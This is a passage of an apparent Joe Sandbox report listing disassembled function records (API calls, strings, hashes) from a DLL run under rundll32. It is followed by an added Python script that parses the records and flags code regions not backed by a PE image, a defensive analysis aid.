                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image_initterm_initterm_e
                              • String ID:
                              • API String ID: 590286634-0
                              • Opcode ID: 95910293f6cf43acfd3add81e6c39d5b89c68359fba24241cde662c66b94a640
                              • Instruction ID: 830774e07cfe581141ef0cc8590ccb5796df7da44965c0eed159cec14fa4da60
                              • Opcode Fuzzy Hash: 95910293f6cf43acfd3add81e6c39d5b89c68359fba24241cde662c66b94a640
                              • Instruction Fuzzy Hash: BA21CF316496459EDF109BBF97947EC33B19B0622FF144415C581A7F80FB32C10AA665
                              APIs
                              Memory Dump Source
                              • Source File: 00000003.00000002.3544730523.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4660000_rundll32.jbxd
                              Similarity
                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                              • String ID:
                              • API String ID: 3016257755-0
                              • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                              • Instruction ID: dc140576cb17360e66db5d7976076ad5159ff0861c4feeab05928b62e36507d9
                              • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                              • Instruction Fuzzy Hash: AE114B7240014EBBCF125F84DC51CEE3F62BB18B58F588419FA6899130E636E5B2AF85
                              APIs
                              • _malloc.LIBCMT ref: 0466F040
                                • Part of subcall function 0466EF92: __FF_MSGBANNER.LIBCMT ref: 0466EFAB
                                • Part of subcall function 0466EF92: __NMSG_WRITE.LIBCMT ref: 0466EFB2
                              • std::exception::exception.LIBCMT ref: 0466F075
                              • std::exception::exception.LIBCMT ref: 0466F08F
                              • __CxxThrowException@8.LIBCMT ref: 0466F0A0
                              Memory Dump Source
                              • Source File: 00000003.00000002.3544730523.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4660000_rundll32.jbxd
                              Similarity
                              • API ID: std::exception::exception$Exception@8Throw_malloc
                              • String ID:
                              • API String ID: 2388904642-0
                              • Opcode ID: d3a09533d38bf96fbcdeea7404bc42bbfdad1700ad1bdc5c3aa64567319aa372
                              • Instruction ID: 49119efe2257f46cc66a10c5f58082a93faadc3ab8c1aa950380b1f317841413
                              • Opcode Fuzzy Hash: d3a09533d38bf96fbcdeea7404bc42bbfdad1700ad1bdc5c3aa64567319aa372
                              • Instruction Fuzzy Hash: 4EF02875400219BBEB19EF54FC24ABE7BA9EB50748F90402DD50292190FB72FE02CB94
                              APIs
                              • WakeByAddressSingle.API-MS-WIN-CORE-SYNCH-L1-2-0(?), ref: 6CC4EFFE
                              • WakeByAddressSingle.API-MS-WIN-CORE-SYNCH-L1-2-0(6CCC2124), ref: 6CC4F203
                              Strings
                              • use of std::thread::current() is not possible after the thread's local data has been destroyedstd\src\thread\mod.rs, xrefs: 6CC4F2EC
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: AddressSingleWake
                              • String ID: use of std::thread::current() is not possible after the thread's local data has been destroyedstd\src\thread\mod.rs
                              • API String ID: 3114109732-459553403
                              • Opcode ID: 6607e3423ae351b1388e58a8b4e0538524369dc381299b545968e97be3b63a11
                              • Instruction ID: 927f61083bb13b3dcaed81207d7d2b3507cedaaca7bcf864042ad70707340d17
                              • Opcode Fuzzy Hash: 6607e3423ae351b1388e58a8b4e0538524369dc381299b545968e97be3b63a11
                              • Instruction Fuzzy Hash: F7D1E174A00248CFDB11CFA5C494BDEBBB1FF4A308F14C16AD916ABB91E7359946CB90
                              APIs
                              • _malloc.LIBCMT ref: 046698DF
                                • Part of subcall function 0466EF92: __FF_MSGBANNER.LIBCMT ref: 0466EFAB
                                • Part of subcall function 0466EF92: __NMSG_WRITE.LIBCMT ref: 0466EFB2
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3544730523.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4660000_rundll32.jbxd
                              Similarity
                              • API ID: _malloc
                              • String ID: &
                              • API String ID: 1579825452-3042966939
                              • Opcode ID: b598dab0db35afd4cecf5f088763f976702afa5d49a8f07c45262a70ab33495b
                              • Instruction ID: faa14f0ba0e423febb9811dff7d37899f27110a0c572b2c9013a040f74921b31
                              • Opcode Fuzzy Hash: b598dab0db35afd4cecf5f088763f976702afa5d49a8f07c45262a70ab33495b
                              • Instruction Fuzzy Hash: A1C123F1A002199FDB24CF55CCC4BAAB7B4EB58304F1485ADDA0A97241E774BE89CF54
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3544730523.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4660000_rundll32.jbxd
                              Similarity
                              • API ID: _memset_wcsrchr
                              • String ID: D
                              • API String ID: 1675014779-2746444292
                              • Opcode ID: 9acbe9d8cb78e65742daa30000f13f8c3748e978fcf48c481d77b0f92a49766f
                              • Instruction ID: 2d004c573bdfef37b30b6804c282f84496a10a57517cca3a2878a3a41eb171a5
                              • Opcode Fuzzy Hash: 9acbe9d8cb78e65742daa30000f13f8c3748e978fcf48c481d77b0f92a49766f
                              • Instruction Fuzzy Hash: AD31E7729402187BE724ABE49C89FEF7768EB54710F100229FB0AEA1C0EA717945C7A5
                              APIs
                              • WaitOnAddress.API-MS-WIN-CORE-SYNCH-L1-2-0(00000000,000000FF,00000001,000000FF), ref: 6CC4A645
                              • GetLastError.KERNEL32 ref: 6CC4A64C
                              Strings
                              • use of std::thread::current() is not possible after the thread's local data has been destroyedstd\src\thread\mod.rs, xrefs: 6CC4A65A
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: AddressErrorLastWait
                              • String ID: use of std::thread::current() is not possible after the thread's local data has been destroyedstd\src\thread\mod.rs
                              • API String ID: 1574541344-459553403
                              • Opcode ID: f994aa86faaa7705c2c73c79c99d16be3deed8ad24de3e8720454b3b9d4f6d0e
                              • Instruction ID: 8a39c91f72af55aa74f81cb00712bec1462cf788adbbf519f5fbbf30b2485480
                              • Opcode Fuzzy Hash: f994aa86faaa7705c2c73c79c99d16be3deed8ad24de3e8720454b3b9d4f6d0e
                              • Instruction Fuzzy Hash: 7341F034A00584CFD711CF58C594BAAB7B0EB86318F10C1BAD815ABB81E736A906CF90
                              APIs
                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 6CC61C55
                              • ___raise_securityfailure.LIBCMT ref: 6CC61D3D
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: FeaturePresentProcessor___raise_securityfailure
                              • String ID: ^j+
                              • API String ID: 3761405300-2127788193
                              • Opcode ID: b96265487bf190aa0181e67f3da6b911cc64d24529c8a44606d0acb213a62040
                              • Instruction ID: 4dfac9581c7b23cb796d55b5a7de5d6e0a0500fe912a4537a9e6610132732fc1
                              • Opcode Fuzzy Hash: b96265487bf190aa0181e67f3da6b911cc64d24529c8a44606d0acb213a62040
                              • Instruction Fuzzy Hash: A621D5B8B15301EEEB04CF1AD5A97457BB4FB0A324F10612AE509DA7A0E7B09A81CF55
                              APIs
                              • __getptd.LIBCMT ref: 0468009D
                                • Part of subcall function 04673800: __getptd_noexit.LIBCMT ref: 04673803
                                • Part of subcall function 04673800: __amsg_exit.LIBCMT ref: 04673810
                              • __getptd.LIBCMT ref: 046800AB
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3544730523.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4660000_rundll32.jbxd
                              Similarity
                              • API ID: __getptd$__amsg_exit__getptd_noexit
                              • String ID: csm
                              • API String ID: 803148776-1018135373
                              • Opcode ID: 5ee49735deb65bfb04637f9989aa34e627c47001ba93af2d51fe64eeff1f3342
                              • Instruction ID: d0a39c0c1d8acee410a3510c437e985c973c76557e766d727d051e395975750d
                              • Opcode Fuzzy Hash: 5ee49735deb65bfb04637f9989aa34e627c47001ba93af2d51fe64eeff1f3342
                              • Instruction Fuzzy Hash: 2501D130800201CEDF38EFA6D450AADB7B8AF20224F154A2ED4C166350FB30B9A9CB51
                              APIs
                              • memmove.VCRUNTIME140(?,?,0000007A), ref: 6CBDC209
                              • memmove.VCRUNTIME140(?,?,0000007A), ref: 6CBDC247
                              • memmove.VCRUNTIME140(?,?,00000088), ref: 6CBDC2BF
                              • memmove.VCRUNTIME140(?,?,0000007E), ref: 6CBDC470
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: memmove
                              • String ID:
                              • API String ID: 2162964266-0
                              • Opcode ID: f91d564234596e829efe6be2e3d8a1e0f4c534759e0e2bbbabb5aa528f3748cd
                              • Instruction ID: 0a6838ec94dcf1fca953715f140cd30554322bc04b5dcd3a7d8926120ef5f95f
                              • Opcode Fuzzy Hash: f91d564234596e829efe6be2e3d8a1e0f4c534759e0e2bbbabb5aa528f3748cd
                              • Instruction Fuzzy Hash: C6916775A0D3C19FC322CF24C45039EBBE1AF9A308F19495DD4C84BA82DB74A959CB93
                              APIs
                              • memmove.VCRUNTIME140(?,?,0000007E), ref: 6CC07FB8
                              • memmove.VCRUNTIME140(?,?,0000007E), ref: 6CC08062
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: memmove
                              • String ID:
                              • API String ID: 2162964266-0
                              • Opcode ID: 2d2f7392efc5b9275b59d051b21547cf2ce0048b759807a6a74b0612d9487ecc
                              • Instruction ID: 63de60bd2a93e9e9dd027d68ab07af624ff31d1992a4010c4f8f0efc21955a76
                              • Opcode Fuzzy Hash: 2d2f7392efc5b9275b59d051b21547cf2ce0048b759807a6a74b0612d9487ecc
                              • Instruction Fuzzy Hash: 1C41A12550D3C0AED7168B6988119DFFFF59F9A600F08C98EE8D84B742D271A909C7A3
                              APIs
                              • memmove.VCRUNTIME140(?,?,00000388), ref: 6CBFE113
                              • memmove.VCRUNTIME140(?,?,00000388), ref: 6CBFE160
                              • memmove.VCRUNTIME140(?,?,00000388), ref: 6CBFE194
                              • memmove.VCRUNTIME140(?,?,00000388), ref: 6CBFE1C4
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: memmove
                              • String ID:
                              • API String ID: 2162964266-0
                              • Opcode ID: 70bb0f79e39f579514864e8d5dc0cae8624bcbb7799a7c65222dc1aafb4f6483
                              • Instruction ID: b08dd148a706eba5efe5e1bcaf675735ee630c2efea765fd6989e11ab2e9ba4b
                              • Opcode Fuzzy Hash: 70bb0f79e39f579514864e8d5dc0cae8624bcbb7799a7c65222dc1aafb4f6483
                              • Instruction Fuzzy Hash: 533152719042448BDB42CF19C4C0AE977A9EF59348F0944B9EC5C9F746EB747A0A8FA1
                              APIs
                              • memmove.VCRUNTIME140(?,?,00000388), ref: 6CC28F5E
                              • memmove.VCRUNTIME140(?,?,00000388), ref: 6CC28FB3
                              • memmove.VCRUNTIME140(?,?,00000388), ref: 6CC28FE4
                              • memmove.VCRUNTIME140(?,?,00000388), ref: 6CC29012
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: memmove
                              • String ID:
                              • API String ID: 2162964266-0
                              • Opcode ID: 90e97dfead12e17bd72831e8a9a9794cac9df5bfdb69273644dbc56d6a3a8d9d
                              • Instruction ID: 440287b9177f32ea99b94a7cf727df4c7ef7cc6055d50aef81da6c71f813512d
                              • Opcode Fuzzy Hash: 90e97dfead12e17bd72831e8a9a9794cac9df5bfdb69273644dbc56d6a3a8d9d
                              • Instruction Fuzzy Hash: A8315E719087049BC762CB39C480AD7B7E9EF99348F00485DE4AE87740EB79BA098F91
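The function records above come from two distinct memory sources inside rundll32: the loaded HLMJbase.dll image at offset 6CBC0000 (based on PE: true; VCRUNTIME140 memmove calls, WaitOnAddress/WakeByAddressSingle synchronisation and Rust std::thread panic strings) and a region at 04660000 that is not backed by a PE image (based on PE: false) but still yields whole functions built on the internals of the pre-UCRT Visual C++ runtime (__getptd, __amsg_exit, __FF_MSGBANNER, __calloc_crt). Code recovered from a non-image-backed region was not loaded from a file on disk, so an analyst wants those records separated from the DLL's own before reading further. The Python script below is an added example, not part of the Joe Sandbox report: it parses records in exactly this layout (APIs, optional Strings, Memory Dump Source, Joe Sandbox IDA Plugin, Similarity) and groups them by memory region. The SAMPLE text inside it is constructed from the records on this page and abbreviated; the parser also tolerates the trailing "Download File" link text that web extraction glues onto the Associated dump names.

```python
"""Parser for the per-function records Joe Sandbox prints in the disassembly
section of a report (APIs / Strings / Memory Dump Source / Similarity).
Added example, not Joe Sandbox code. SAMPLE is constructed from the layout
of the report records and abbreviated (most fuzzy-hash lines dropped)."""
import re
from collections import defaultdict

SAMPLE = r"""
APIs
• memmove.VCRUNTIME140(?,?,000000AC), ref: 6CC38176
  • Part of subcall function 6CC23A0F: memmove.VCRUNTIME140(00000000,?,000000B8), ref: 6CC23A29
Memory Dump Source
• Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
• Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
Similarity
• API ID: memmove
• API String ID: 2162964266-0
• Opcode ID: 548f74d799b366aea70baf008907f3bb68b7de111d79c96dd234008f93a7f770
APIs
• _malloc.LIBCMT ref: 0466F040
  • Part of subcall function 0466EF92: __FF_MSGBANNER.LIBCMT ref: 0466EFAB
• __CxxThrowException@8.LIBCMT ref: 0466F0A0
Memory Dump Source
• Source File: 00000003.00000002.3544730523.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_4660000_rundll32.jbxd
Similarity
• API String ID: 2388904642-0
• Opcode ID: d3a09533d38bf96fbcdeea7404bc42bbfdad1700ad1bdc5c3aa64567319aa372
APIs
• WaitOnAddress.API-MS-WIN-CORE-SYNCH-L1-2-0(00000000,000000FF,00000001,000000FF), ref: 6CC4A645
• GetLastError.KERNEL32 ref: 6CC4A64C
Strings
• use of std::thread::current() is not possible after the thread's local data has been destroyedstd\src\thread\mod.rs, xrefs: 6CC4A65A
Memory Dump Source
• Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
Similarity
• API ID: AddressErrorLastWait
• String ID: use of std::thread::current() is not possible after the thread's local data has been destroyedstd\src\thread\mod.rs
• API String ID: 1574541344-459553403
• Opcode ID: f994aa86faaa7705c2c73c79c99d16be3deed8ad24de3e8720454b3b9d4f6d0e
"""

# One API call line: "<api>.<MODULE>(<args>), ref: <hex>"; args are optional.
CALL_RE = re.compile(r"^(?P<api>\S+?)\.(?P<module>[A-Z0-9\-]+)(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]+)$")
SUBCALL_RE = re.compile(r"^Part of subcall function (?P<func>[0-9A-F]+): (?P<call>.+)$")
SOURCE_RE = re.compile(r"^Source File: (?P<dump>\S+?\.sdmp), Offset: (?P<offset>[0-9A-F]+), based on PE: (?P<pe>true|false)$")
STRING_RE = re.compile(r"^(?P<text>.+), xrefs: (?P<xref>[0-9A-F]+)$")
SECTIONS = ("Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity")


def parse_records(text):
    """One dict per function record. A record starts at an 'APIs' heading;
    fragments without an Opcode ID (a record cut off at a page boundary) are dropped."""
    records, rec, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if not line:
            continue
        if line == "APIs":
            if rec and "Opcode ID" in rec:
                records.append(rec)
            rec, section = {"calls": [], "strings": [], "associated": []}, "APIs"
            continue
        if rec is None:
            continue
        if line in SECTIONS:
            section = line
            continue
        if section == "APIs":
            sub = SUBCALL_RE.match(line)
            call = CALL_RE.match(sub.group("call") if sub else line)
            if call:  # record which callee the API was reached through, if any
                rec["calls"].append({**call.groupdict(), "via_subcall": sub.group("func") if sub else None})
        elif section == "Strings":
            m = STRING_RE.match(line)
            if m:
                rec["strings"].append(m.groupdict())
        elif section == "Memory Dump Source":
            m = SOURCE_RE.match(line)
            if m:
                rec["dump"], rec["offset"] = m.group("dump"), int(m.group("offset"), 16)
                rec["based_on_pe"] = m.group("pe") == "true"
            elif line.startswith("Associated: "):  # drop glued-on link text after ".sdmp"
                rec["associated"].append(line.split(": ", 1)[1].split(".sdmp")[0] + ".sdmp")
        else:  # IDA Plugin / Similarity: plain "Key: value" pairs
            key, _, value = line.partition(":")
            rec[key.strip()] = value.strip()
    if rec and "Opcode ID" in rec:
        records.append(rec)
    return records


def regions(records):
    """Group records by the base offset of the memory region they were recovered from."""
    out = defaultdict(lambda: {"based_on_pe": None, "functions": 0, "apis": set(), "snapshot": None})
    for r in records:
        g = out[r["offset"]]
        g["based_on_pe"], g["snapshot"] = r["based_on_pe"], r.get("Snapshot File")
        g["functions"] += 1
        g["apis"].update(c["api"] for c in r["calls"])
    return dict(out)


def unbacked_code_regions(records):
    """Offsets of regions that yielded functions but are not backed by a PE image:
    code that did not come from a file on disk and deserves separate scrutiny."""
    return sorted(off for off, g in regions(records).items() if g["based_on_pe"] is False)


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for off, g in sorted(regions(recs).items()):
        print(f"{off:08X} pe={g['based_on_pe']} functions={g['functions']} apis={sorted(g['apis'])}")
    print("not image-backed:", [f"{o:08X}" for o in unbacked_code_regions(recs)])
```

Run against the full report text the same way (read the page into `parse_records`); the region table then shows at a glance which API usage belongs to the DLL image and which to the 04660000 region, and the `associated` list of each record names the companion dumps to pull for that region.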